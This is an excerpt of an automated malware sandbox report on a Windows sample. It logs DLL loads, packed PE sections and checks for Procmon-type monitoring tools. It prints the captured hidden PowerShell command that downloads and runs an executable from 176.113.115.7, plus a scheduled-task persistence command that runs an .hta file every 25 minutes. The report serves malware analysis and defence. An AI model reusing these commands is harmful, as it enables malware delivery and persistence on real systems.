                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                  Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: uw7A6EF76R.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: uw7A6EF76R.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: uw7A6EF76R.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: uw7A6EF76R.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: uw7A6EF76R.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: uw7A6EF76R.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: uw7A6EF76R.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: Htem.pdb source: powershell.exe, 00000008.00000002.1003702720.0000020058B82000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb,V source: powershell.exe, 00000008.00000002.1004489959.0000020058E30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: em.Core.pdb source: powershell.exe, 00000008.00000002.1003702720.0000020058B82000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbpdblib.pdb source: powershell.exe, 00000008.00000002.1003702720.0000020058B82000.00000004.00000020.00020000.00000000.sdmp
                  Source: uw7A6EF76R.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: uw7A6EF76R.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: uw7A6EF76R.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: uw7A6EF76R.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: uw7A6EF76R.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE Unpacked PE file: 10.2.TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 11.2.rapes.exe.ef0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 12.2.rapes.exe.ef0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE Unpacked PE file: 13.2.TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 22.2.rapes.exe.ef0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW;
                  Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe Code function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
                  Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                  Source: rapes.exe.10.dr Static PE information: real checksum: 0x1e5015 should be: 0x1d9168
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.dr Static PE information: real checksum: 0x1e5015 should be: 0x1d9168
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.dr Static PE information: section name:
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.dr Static PE information: section name: .idata
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.dr Static PE information: section name:
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.dr Static PE information: section name: pourftpu
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.dr Static PE information: section name: cybaxvbc
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.dr Static PE information: section name: .taggant
                  Source: rapes.exe.10.dr Static PE information: section name:
                  Source: rapes.exe.10.dr Static PE information: section name: .idata
                  Source: rapes.exe.10.dr Static PE information: section name:
                  Source: rapes.exe.10.dr Static PE information: section name: pourftpu
                  Source: rapes.exe.10.dr Static PE information: section name: cybaxvbc
                  Source: rapes.exe.10.dr Static PE information: section name: .taggant
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe Code function: 0_2_00ABE953 push eax; iretd 0_2_00ABE958
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe Code function: 0_2_00AC0A76 push ecx; ret 0_2_00AC0A89
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe Code function: 0_2_00B0164A pushad ; ret 0_2_00B0164B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF9C15A00BD pushad ; iretd 8_2_00007FF9C15A00C1
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 22_2_00F19FD5 push ecx; ret 22_2_00F19FD4
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.dr Static PE information: section name: entropy: 7.973885483229057
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.dr Static PE information: section name: pourftpu entropy: 7.954503184597595
                  Source: rapes.exe.10.dr Static PE information: section name: entropy: 7.973885483229057
                  Source: rapes.exe.10.dr Static PE information: section name: pourftpu entropy: 7.954503184597595

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

                  Boot Survival

                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClass
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: Regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: Filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B31C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B31C41
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
